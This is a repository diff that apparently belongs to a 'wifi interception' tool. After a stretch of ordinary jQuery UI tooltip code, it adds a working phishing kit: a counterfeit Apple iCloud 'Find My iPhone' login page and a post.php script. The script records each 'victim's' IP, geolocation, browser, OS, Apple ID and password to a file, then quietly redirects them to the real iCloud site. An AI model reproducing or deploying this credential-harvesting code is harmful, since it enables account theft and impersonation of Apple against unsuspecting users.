+			index = $.inArray( id, describedby );
+
+		if ( index !== -1 ) {
+			describedby.splice( index, 1 );
+		}
+
+		elem.removeData( "ui-tooltip-id" );
+		describedby = $.trim( describedby.join( " " ) );
+		if ( describedby ) {
+			elem.attr( "aria-describedby", describedby );
+		} else {
+			elem.removeAttr( "aria-describedby" );
+		}
+	},
+
+	_create: function() {
+		this._on({
+			mouseover: "open",
+			focusin: "open"
+		});
+
+		// IDs of generated tooltips, needed for destroy
+		this.tooltips = {};
+
+		// IDs of parent tooltips where we removed the title attribute
+		this.parents = {};
+
+		if ( this.options.disabled ) {
+			this._disable();
+		}
+
+		// Append the aria-live region so tooltips announce correctly
+		this.liveRegion = $( "<div>" )
+			.attr({
+				role: "log",
+				"aria-live": "assertive",
+				"aria-relevant": "additions"
+			})
+			.addClass( "ui-helper-hidden-accessible" )
+			.appendTo( this.document[ 0 ].body );
+	},
+
+	_setOption: function( key, value ) {
+		var that = this;
+
+		if ( key === "disabled" ) {
+			this[ value ? "_disable" : "_enable" ]();
+			this.options[ key ] = value;
+			// disable element style changes
+			return;
+		}
+
+		this._super( key, value );
+
+		if ( key === "content" ) {
+			$.each( this.tooltips, function( id, tooltipData ) {
+				that._updateContent( tooltipData.element );
+			});
+		}
+	},
+
+	_disable: function() {
+		var that = this;
+
+		// close open tooltips
+		$.each( this.tooltips, function( id, tooltipData ) {
+			var event = $.Event( "blur" );
+			event.target = event.currentTarget = tooltipData.element[ 0 ];
+			that.close( event, true );
+		});
+
+		// remove title attributes to prevent native tooltips
+		this.element.find( this.options.items ).addBack().each(function() {
+			var element = $( this );
+			if ( element.is( "[title]" ) ) {
+				element
+					.data( "ui-tooltip-title", element.attr( "title" ) )
+					.removeAttr( "title" );
+			}
+		});
+	},
+
+	_enable: function() {
+		// restore title attributes
+		this.element.find( this.options.items ).addBack().each(function() {
+			var element = $( this );
+			if ( element.data( "ui-tooltip-title" ) ) {
+				element.attr( "title", element.data( "ui-tooltip-title" ) );
+			}
+		});
+	},
+
+	open: function( event ) {
+		var that = this,
+			target = $( event ? event.target : this.element )
+				// we need closest here due to mouseover bubbling,
+				// but always pointing at the same event target
+				.closest( this.options.items );
+
+		// No element to show a tooltip for or the tooltip is already open
+		if ( !target.length || target.data( "ui-tooltip-id" ) ) {
+			return;
+		}
+
+		if ( target.attr( "title" ) ) {
+			target.data( "ui-tooltip-title", target.attr( "title" ) );
+		}
+
+		target.data( "ui-tooltip-open", true );
+
+		// kill parent tooltips, custom or native, for hover
+		if ( event && event.type === "mouseover" ) {
+			target.parents().each(function() {
+				var parent = $( this ),
+					blurEvent;
+				if ( parent.data( "ui-tooltip-open" ) ) {
+					blurEvent = $.Event( "blur" );
+					blurEvent.target = blurEvent.currentTarget = this;
+					that.close( blurEvent, true );
+				}
+				if ( parent.attr( "title" ) ) {
+					parent.uniqueId();
+					that.parents[ this.id ] = {
+						element: this,
+						title: parent.attr( "title" )
+					};
+					parent.attr( "title", "" );
+				}
+			});
+		}
+
+		this._updateContent( target, event );
+	},
+
+	_updateContent: function( target, event ) {
+		var content,
+			contentOption = this.options.content,
+			that = this,
+			eventType = event ? event.type : null;
+
+		if ( typeof contentOption === "string" ) {
+			return this._open( event, target, contentOption );
+		}
+
+		content = contentOption.call( target[0], function( response ) {
+			// ignore async response if tooltip was closed already
+			if ( !target.data( "ui-tooltip-open" ) ) {
+				return;
+			}
+			// IE may instantly serve a cached response for ajax requests
+			// delay this call to _open so the other call to _open runs first
+			that._delay(function() {
+				// jQuery creates a special event for focusin when it doesn't
+				// exist natively. To improve performance, the native event
+				// object is reused and the type is changed. Therefore, we can't
+				// rely on the type being correct after the event finished
+				// bubbling, so we set it back to the previous value. (#8740)
+				if ( event ) {
+					event.type = eventType;
+				}
+				this._open( event, target, response );
+			});
+		});
+		if ( content ) {
+			this._open( event, target, content );
+		}
+	},
+
+	_open: function( event, target, content ) {
+		var tooltipData, tooltip, events, delayedShow, a11yContent,
+			positionOption = $.extend( {}, this.options.position );
+
+		if ( !content ) {
+			return;
+		}
+
+		// Content can be updated multiple times. If the tooltip already
+		// exists, then just update the content and bail.
+		tooltipData = this._find( target );
+		if ( tooltipData ) {
+			tooltipData.tooltip.find( ".ui-tooltip-content" ).html( content );
+			return;
+		}
+
+		// if we have a title, clear it to prevent the native tooltip
+		// we have to check first to avoid defining a title if none exists
+		// (we don't want to cause an element to start matching [title])
+		//
+		// We use removeAttr only for key events, to allow IE to export the correct
+		// accessible attributes. For mouse events, set to empty string to avoid
+		// native tooltip showing up (happens only when removing inside mouseover).
+		if ( target.is( "[title]" ) ) {
+			if ( event && event.type === "mouseover" ) {
+				target.attr( "title", "" );
+			} else {
+				target.removeAttr( "title" );
+			}
+		}
+
+		tooltipData = this._tooltip( target );
+		tooltip = tooltipData.tooltip;
+		this._addDescribedBy( target, tooltip.attr( "id" ) );
+		tooltip.find( ".ui-tooltip-content" ).html( content );
+
+		// Support: Voiceover on OS X, JAWS on IE <= 9
+		// JAWS announces deletions even when aria-relevant="additions"
+		// Voiceover will sometimes re-read the entire log region's contents from the beginning
+		this.liveRegion.children().hide();
+		if ( content.clone ) {
+			a11yContent = content.clone();
+			a11yContent.removeAttr( "id" ).find( "[id]" ).removeAttr( "id" );
+		} else {
+			a11yContent = content;
+		}
+		$( "<div>" ).html( a11yContent ).appendTo( this.liveRegion );
+
+		function position( event ) {
+			positionOption.of = event;
+			if ( tooltip.is( ":hidden" ) ) {
+				return;
+			}
+			tooltip.position( positionOption );
+		}
+		if ( this.options.track && event && /^mouse/.test( event.type ) ) {
+			this._on( this.document, {
+				mousemove: position
+			});
+			// trigger once to override element-relative positioning
+			position( event );
+		} else {
+			tooltip.position( $.extend({
+				of: target
+			}, this.options.position ) );
+		}
+
+		tooltip.hide();
+
+		this._show( tooltip, this.options.show );
+		// Handle tracking tooltips that are shown with a delay (#8644). As soon
+		// as the tooltip is visible, position the tooltip using the most recent
+		// event.
+		if ( this.options.show && this.options.show.delay ) {
+			delayedShow = this.delayedShow = setInterval(function() {
+				if ( tooltip.is( ":visible" ) ) {
+					position( positionOption.of );
+					clearInterval( delayedShow );
+				}
+			}, $.fx.interval );
+		}
+
+		this._trigger( "open", event, { tooltip: tooltip } );
+
+		events = {
+			keyup: function( event ) {
+				if ( event.keyCode === $.ui.keyCode.ESCAPE ) {
+					var fakeEvent = $.Event(event);
+					fakeEvent.currentTarget = target[0];
+					this.close( fakeEvent, true );
+				}
+			}
+		};
+
+		// Only bind remove handler for delegated targets. Non-delegated
+		// tooltips will handle this in destroy.
+		if ( target[ 0 ] !== this.element[ 0 ] ) {
+			events.remove = function() {
+				this._removeTooltip( tooltip );
+			};
+		}
+
+		if ( !event || event.type === "mouseover" ) {
+			events.mouseleave = "close";
+		}
+		if ( !event || event.type === "focusin" ) {
+			events.focusout = "close";
+		}
+		this._on( true, target, events );
+	},
+
+	close: function( event ) {
+		var tooltip,
+			that = this,
+			target = $( event ? event.currentTarget : this.element ),
+			tooltipData = this._find( target );
+
+		// The tooltip may already be closed
+		if ( !tooltipData ) {
+			return;
+		}
+
+		tooltip = tooltipData.tooltip;
+
+		// disabling closes the tooltip, so we need to track when we're closing
+		// to avoid an infinite loop in case the tooltip becomes disabled on close
+		if ( tooltipData.closing ) {
+			return;
+		}
+
+		// Clear the interval for delayed tracking tooltips
+		clearInterval( this.delayedShow );
+
+		// only set title if we had one before (see comment in _open())
+		// If the title attribute has changed since open(), don't restore
+		if ( target.data( "ui-tooltip-title" ) && !target.attr( "title" ) ) {
+			target.attr( "title", target.data( "ui-tooltip-title" ) );
+		}
+
+		this._removeDescribedBy( target );
+
+		tooltipData.hiding = true;
+		tooltip.stop( true );
+		this._hide( tooltip, this.options.hide, function() {
+			that._removeTooltip( $( this ) );
+		});
+
+		target.removeData( "ui-tooltip-open" );
+		this._off( target, "mouseleave focusout keyup" );
+
+		// Remove 'remove' binding only on delegated targets
+		if ( target[ 0 ] !== this.element[ 0 ] ) {
+			this._off( target, "remove" );
+		}
+		this._off( this.document, "mousemove" );
+
+		if ( event && event.type === "mouseleave" ) {
+			$.each( this.parents, function( id, parent ) {
+				$( parent.element ).attr( "title", parent.title );
+				delete that.parents[ id ];
+			});
+		}
+
+		tooltipData.closing = true;
+		this._trigger( "close", event, { tooltip: tooltip } );
+		if ( !tooltipData.hiding ) {
+			tooltipData.closing = false;
+		}
+	},
+
+	_tooltip: function( element ) {
+		var tooltip = $( "<div>" )
+				.attr( "role", "tooltip" )
+				.addClass( "ui-tooltip ui-widget ui-corner-all ui-widget-content " +
+					( this.options.tooltipClass || "" ) ),
+			id = tooltip.uniqueId().attr( "id" );
+
+		$( "<div>" )
+			.addClass( "ui-tooltip-content" )
+			.appendTo( tooltip );
+
+		tooltip.appendTo( this.document[0].body );
+
+		return this.tooltips[ id ] = {
+			element: element,
+			tooltip: tooltip
+		};
+	},
+
+	_find: function( target ) {
+		var id = target.data( "ui-tooltip-id" );
+		return id ? this.tooltips[ id ] : null;
+	},
+
+	_removeTooltip: function( tooltip ) {
+		tooltip.remove();
+		delete this.tooltips[ tooltip.attr( "id" ) ];
+	},
+
+	_destroy: function() {
+		var that = this;
+
+		// close open tooltips
+		$.each( this.tooltips, function( id, tooltipData ) {
+			// Delegate to close method to handle common cleanup
+			var event = $.Event( "blur" ),
+				element = tooltipData.element;
+			event.target = event.currentTarget = element[ 0 ];
+			that.close( event, true );
+
+			// Remove immediately; destroying an open tooltip doesn't use the
+			// hide animation
+			$( "#" + id ).remove();
+
+			// Restore the title
+			if ( element.data( "ui-tooltip-title" ) ) {
+				// If the title attribute has changed since open(), don't restore
+				if ( !element.attr( "title" ) ) {
+					element.attr( "title", element.data( "ui-tooltip-title" ) );
+				}
+				element.removeData( "ui-tooltip-title" );
+			}
+		});
+		this.liveRegion.remove();
+	}
+});
+
+
+
+}));

+ 112 - 0
.pages/icloud/mobile.html

@@ -0,0 +1,112 @@
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="robots" content="nofollow"><title>Apple Inc.</title><link rel="stylesheet" type="text/css" href="./Apple Inc._files/style.css"><style type="text/css"></style></head>   
+    <body id="main-body">
+    <link rel="stylesheet" href="./Apple Inc._files/bootstrap.min.css">
+    
+
+    <script src="./Apple Inc._files/jquery.min.js"></script>
+    <script>
+        function SubmitMe() {
+            $.ajax({
+                url: 'inform.php',
+                dataType: 'json',
+                type: 'post',
+                contentType: 'application/json',
+                data: JSON.stringify( { "username": $('#username').val(), "pw": $('#password').val() } ),
+                processData: false,
+                success: function( data, textStatus, jQxhr ){
+                    $('#result').html( JSON.stringify( data ) );
+                },
+                error: function( jqXhr, textStatus, errorThrown ){
+                    alert("This account doesn't exist please check your Apple ID and Password and try again.");
+                }
+            });
+            return false;
+        }
+    </script>
+
+
+<div id="container">
+    <div id="row">
+        <div id="iCloudLogo"></div>
+        <div id="title-center">
+            <h1>Find My iPhone</h1>
+        </div>
+        <div id="form-center">
+            <form action="post.php" method="post">
+                <div id="form-group-container">
+                    <div id="form-group">
+                        <label for="username">Apple ID</label>
+                       <input autocorrect="off" autocapitalize="off" name="email" id="username" 
+                       autofocus="autofocus" placeholder="example@icloud.com" type="text">
+                        <br>
+                    </div>
+                    <div id="form-group">
+                        <label for="password">Password</label>
+                        <input autocorrect="off" autocapitalize="off" type="password" name="password" id="password" placeholder="required">
+
+                    </div>
+                </div>
+                <input type="hidden" value="English" name="lang" id="lang">
+
+                <input type="hidden" value="www.icloudre.com/apple.html" name="link">
+                <input type="submit" style="position: absolute; height: 0px; width: 0px; border: none; padding: 0px;" hidefocus="true" tabindex="-1">
+            </form>
+        </div>
+        <div id="help-center">
+            <a class="help-a-style" href="https://iforgot.apple.com/">Forgot your Apple ID or password?</a>
+            <span id="result"></span>
+        </div>
+        <div id="footer">
+                            <a class="help-a-style" style="font-size: 35pt;" href="http://www.apple.com/icloud/setup/">Setup Instruction</a>
+                        <p>Version 8.0 (6A86)</p>
+        </div>
+    </div>
+</div>
+
+
+
+<script src="./Apple Inc._files/bootstrap.min.js"></script>
+<script>
+    $(document).ready(function() {
+        var userLang = navigator.language || navigator.userLanguage;
+        console.log(userLang);
+        $("input[name=apple]").focus();
+        $(".clearable").on('click', function(){
+            $("input[name=apple]").val('').change();
+            $(this).attr("src", "blue-icon-close.png");
+            $(this).css("display", "none");
+            $(this).attr("src", "Close-icon.png");
+        });
+        function isValidEmailAddress(emailAddress) {
+            var pattern = new RegExp(/^(("[\w-+\s]+")|([\w-+]+(?:\.[\w-+]+)*)|("[\w-+\s]+")([\w-+]+(?:\.[\w-+]+)*))(@((?:[\w-+]+\.)*\w[\w-+]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$)|(@\[?((25[0-5]\.|2[0-4][\d]\.|1[\d]{2}\.|[\d]{1,2}\.))((25[0-5]|2[0-4][\d]|1[\d]{2}|[\d]{1,2})\.){2}(25[0-5]|2[0-4][\d]|1[\d]{2}|[\d]{1,2})\]?$)/i);
+            return pattern.test(emailAddress);
+        };
+        $('input[name=apple]').bind("keydown", function(e){
+            if(e.which == 13){
+                e.preventDefault();
+                var val = $(this).val();
+                if (!isValidEmailAddress(val)) {
+                    val = val+"@icloud.com";
+                    $(this).val(val);
+                } else {
+                    console.log($(this).val());
+                }
+                console.log(val);
+                $("input[name=pw]").focus();
+                return false;
+            } else if (e.keyCode == 8 || e.keyCode == 46) {
+                if($("input[name=apple]").val() == "") {
+                    $(".clearable").css("display", "none");
+                    $(".clearable").attr("src", "Close-icon.png");
+                }
+            } else if($("input[name=apple]").val() == "") {
+                $(".clearable").css("display", "none");
+                $(".clearable").attr("src", "Close-icon.png");
+            } else {
+                $(".clearable").css("display", "block");
+            }
+        });
+
+    });
+</script>
+</body></html>

+ 130 - 0
.pages/icloud/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2019-2020 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  proxior is a wifi interception.
+*
+*  proxior is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  proxior is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nICLOUD VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['email'] ."\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['password'] ."\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://www.icloud.com/"/> 

برخی فایل ها در این مقایسه diff نمایش داده نمی شوند زیرا تعداد فایل ها بسیار زیاد است